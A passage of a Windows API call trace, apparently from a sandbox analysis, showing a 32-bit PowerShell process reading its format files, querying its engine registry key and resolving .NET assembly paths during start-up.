lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.701] GetLastError () returned 0xcb [0140.701] SetErrorMode (uMode=0x1) returned 0x1 [0140.701] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0140.701] GetLastError () returned 0x0 [0140.701] GetFileType (hFile=0x328) returned 0x1 [0140.701] SetErrorMode (uMode=0x1) returned 0x1 [0140.702] GetFileType (hFile=0x328) returned 0x1 [0140.702] ReadFile (in: hFile=0x328, lpBuffer=0x2e1e514, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e1e514*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.703] GetLastError () returned 0x0 [0140.767] ReadFile (in: hFile=0x328, lpBuffer=0x2e1e514, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e1e514*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.768] GetLastError () returned 0x0 [0140.768] ReadFile (in: hFile=0x328, lpBuffer=0x2e1e514, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e1e514*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.768] GetLastError () returned 0x0 [0140.768] ReadFile (in: hFile=0x328, lpBuffer=0x2e1e514, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e1e514*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.768] GetLastError () returned 0x0 [0140.768] ReadFile (in: hFile=0x328, lpBuffer=0x2e1e514, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e1e514*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.768] GetLastError () returned 0x0 [0140.768] ReadFile (in: hFile=0x328, lpBuffer=0x2e1e514, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e1e514*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.768] GetLastError () returned 0x0 [0140.768] ReadFile (in: hFile=0x328, lpBuffer=0x2e1e514, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e1e514*, lpNumberOfBytesRead=0x25e364*=0x9e2, lpOverlapped=0x0) returned 1 [0140.768] GetLastError () returned 0x0 [0140.768] ReadFile (in: hFile=0x328, lpBuffer=0x2e1da96, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e1da96*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0140.769] GetLastError () returned 0x0 [0140.769] ReadFile (in: hFile=0x328, lpBuffer=0x2e1e514, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e1e514*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0140.769] GetLastError () returned 0x0 [0140.769] CloseHandle (hObject=0x328) returned 1 [0140.769] GetLastError () returned 0x0 [0140.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.769] GetLastError () returned 0x0 [0140.769] SetErrorMode (uMode=0x1) returned 0x1 [0140.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e2f5d0 | out: lpFileInformation=0x2e2f5d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0140.769] GetLastError () returned 0x0 [0140.769] SetErrorMode (uMode=0x1) returned 0x1 [0140.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.769] GetLastError () returned 0x0 [0140.769] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e2e8 | out: phkResult=0x25e2e8*=0x328) returned 0x0 [0140.769] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x0, lpcbData=0x25e32c*=0x0 | out: lpType=0x25e330*=0x1, lpData=0x0, lpcbData=0x25e32c*=0x56) returned 0x0 [0140.770] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x2e48d0, lpcbData=0x25e32c*=0x56 | out: lpType=0x25e330*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e32c*=0x56) returned 0x0 [0140.770] RegCloseKey (hKey=0x328) returned 0x0 [0140.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.770] GetLastError () returned 0x0 [0140.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.770] GetLastError () returned 0x0 [0140.788] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x63a6848e, Data2=0x1cf, Data3=0x4419, Data4=([0]=0x9b, [1]=0xda, [2]=0x92, [3]=0xe2, [4]=0x77, [5]=0x30, [6]=0x67, [7]=0xae))) returned 0x0 [0140.805] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x113cc4af, Data2=0x1e6e, Data3=0x4e9e, Data4=([0]=0xa5, [1]=0xf3, [2]=0xc5, [3]=0x0, [4]=0xc3, [5]=0x98, [6]=0x2d, [7]=0x1c))) returned 0x0 [0140.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25ddfc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0140.806] GetLastError () returned 0x0 [0140.806] SetErrorMode (uMode=0x1) returned 0x1 [0140.807] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0140.807] GetLastError () returned 0x0 [0140.807] GetFileType (hFile=0x328) returned 0x1 [0140.807] SetErrorMode (uMode=0x1) returned 0x1 [0140.807] GetFileType (hFile=0x328) returned 0x1 [0140.807] ReadFile (in: hFile=0x328, lpBuffer=0x2e428b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e428b8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.809] GetLastError () returned 0x0 [0140.809] ReadFile (in: hFile=0x328, lpBuffer=0x2e428b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e428b8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.809] GetLastError () returned 0x0 [0140.809] ReadFile (in: hFile=0x328, lpBuffer=0x2e428b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e428b8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.810] GetLastError () returned 0x0 [0140.810] ReadFile (in: hFile=0x328, lpBuffer=0x2e428b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e428b8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.810] GetLastError () returned 0x0 [0140.810] ReadFile (in: hFile=0x328, lpBuffer=0x2e428b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e428b8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.810] GetLastError () returned 0x0 [0140.811] ReadFile (in: hFile=0x328, lpBuffer=0x2e428b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e428b8*, lpNumberOfBytesRead=0x25e364*=0xfb2, lpOverlapped=0x0) returned 1 [0140.811] GetLastError () returned 0x0 [0140.811] ReadFile (in: hFile=0x328, lpBuffer=0x2e4200a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e4200a*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0140.811] GetLastError () returned 0x0 [0140.811] ReadFile (in: hFile=0x328, lpBuffer=0x2e428b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e428b8*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0140.811] GetLastError () returned 0x0 [0140.811] CloseHandle (hObject=0x328) returned 1 [0140.811] GetLastError () returned 0x0 [0140.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0140.811] GetLastError () returned 0x0 [0140.811] SetErrorMode (uMode=0x1) returned 0x1 [0140.811] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e63148 | out: lpFileInformation=0x2e63148*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0140.811] GetLastError () returned 0x0 [0140.812] SetErrorMode (uMode=0x1) returned 0x1 [0140.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0140.812] GetLastError () returned 0x0 [0140.812] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e2e8 | out: phkResult=0x25e2e8*=0x328) returned 0x0 [0140.812] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x0, lpcbData=0x25e32c*=0x0 | out: lpType=0x25e330*=0x1, lpData=0x0, lpcbData=0x25e32c*=0x56) returned 0x0 [0140.812] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x2e48d0, lpcbData=0x25e32c*=0x56 | out: lpType=0x25e330*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e32c*=0x56) returned 0x0 [0140.812] RegCloseKey (hKey=0x328) returned 0x0 [0140.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0140.812] GetLastError () returned 0x0 [0140.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0140.812] GetLastError () returned 0x0 [0140.814] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xcf703160, Data2=0x5b1, Data3=0x408d, Data4=([0]=0x86, [1]=0x9a, [2]=0xfb, [3]=0x44, [4]=0x6a, [5]=0xb6, [6]=0xa1, [7]=0xfc))) returned 0x0 [0140.820] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xb752de2d, Data2=0x1e70, Data3=0x47f2, Data4=([0]=0xaa, [1]=0x91, [2]=0x63, [3]=0x2f, [4]=0xf3, [5]=0x4e, [6]=0xf0, [7]=0xff))) returned 0x0 [0140.879] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xe14eecf5, Data2=0xbe6a, Data3=0x402c, Data4=([0]=0xb4, [1]=0x44, [2]=0xb4, [3]=0xb8, [4]=0x47, [5]=0x56, [6]=0x89, [7]=0xfb))) returned 0x0 [0140.879] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x1abe32de, Data2=0x34f, Data3=0x4b6c, Data4=([0]=0xbe, [1]=0x6b, [2]=0x77, [3]=0xcd, [4]=0xf, [5]=0xd5, [6]=0x60, [7]=0x34))) returned 0x0 [0140.879] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xa0350ace, Data2=0x38cc, Data3=0x4e4b, Data4=([0]=0xb0, [1]=0x13, [2]=0xa1, [3]=0xba, [4]=0x28, [5]=0x29, [6]=0x70, [7]=0x3))) returned 0x0 [0140.879] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x684e64e1, Data2=0x9206, Data3=0x4c5b, Data4=([0]=0xb1, [1]=0x5d, [2]=0xd2, [3]=0xac, [4]=0x51, [5]=0x99, [6]=0xf1, [7]=0xf2))) returned 0x0 [0140.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25ddfc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.879] GetLastError () returned 0x0 [0140.879] SetErrorMode (uMode=0x1) returned 0x1 [0140.879] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0140.880] GetLastError () returned 0x0 [0140.880] GetFileType (hFile=0x328) returned 0x1 [0140.880] SetErrorMode (uMode=0x1) returned 0x1 [0140.880] GetFileType (hFile=0x328) returned 0x1 [0140.880] ReadFile (in: hFile=0x328, lpBuffer=0x2e82af0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e82af0*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.882] GetLastError () returned 0x0 [0140.882] ReadFile (in: hFile=0x328, lpBuffer=0x2e82af0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e82af0*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.882] GetLastError () returned 0x0 [0140.883] ReadFile (in: hFile=0x328, lpBuffer=0x2e82af0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e82af0*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.883] GetLastError () returned 0x0 [0140.883] ReadFile (in: hFile=0x328, lpBuffer=0x2e82af0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e82af0*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.883] GetLastError () returned 0x0 [0140.884] ReadFile (in: hFile=0x328, lpBuffer=0x2e82af0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e82af0*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.884] GetLastError () returned 0x0 [0140.884] ReadFile (in: hFile=0x328, lpBuffer=0x2e82af0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e82af0*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0140.884] GetLastError () returned 0x0 [0140.884] ReadFile (in: hFile=0x328, lpBuffer=0x2e82af0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e82af0*, lpNumberOfBytesRead=0x25e364*=0xaca, lpOverlapped=0x0) returned 1 [0140.884] GetLastError () returned 0x0 [0140.884] ReadFile (in: hFile=0x328, lpBuffer=0x2e8215a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e8215a*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0140.884] GetLastError () returned 0x0 [0140.884] ReadFile (in: hFile=0x328, lpBuffer=0x2e82af0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2e82af0*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0140.884] GetLastError () returned 0x0 [0140.884] CloseHandle (hObject=0x328) returned 1 [0140.884] GetLastError () returned 0x0 [0140.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.884] GetLastError () returned 0x0 [0140.884] SetErrorMode (uMode=0x1) returned 0x1 [0140.884] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ea3aec | out: lpFileInformation=0x2ea3aec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0140.885] GetLastError () returned 0x0 [0140.885] SetErrorMode (uMode=0x1) returned 0x1 [0140.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.885] GetLastError () returned 0x0 [0140.885] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e2e8 | out: phkResult=0x25e2e8*=0x328) returned 0x0 [0140.885] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x0, lpcbData=0x25e32c*=0x0 | out: lpType=0x25e330*=0x1, lpData=0x0, lpcbData=0x25e32c*=0x56) returned 0x0 [0140.885] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x2e48d0, lpcbData=0x25e32c*=0x56 | out: lpType=0x25e330*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e32c*=0x56) returned 0x0 [0140.885] RegCloseKey (hKey=0x328) returned 0x0 [0140.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.885] GetLastError () returned 0x0 [0140.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0140.885] GetLastError () returned 0x0 [0140.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0140.898] GetLastError () returned 0x0 [0140.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0140.900] GetLastError () returned 0x57 [0140.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0140.908] GetLastError () returned 0x57 [0140.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0140.912] GetLastError () returned 0x57 [0140.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0140.913] GetLastError () returned 0x57 [0140.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0140.921] GetLastError () returned 0x57 [0140.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0140.974] GetLastError () returned 0x57 [0140.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0140.976] GetLastError () returned 0x57 [0140.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0140.983] GetLastError () returned 0x57 [0140.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0140.999] GetLastError () returned 0x57 [0140.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25db54, lpFilePart=0x0 | out: 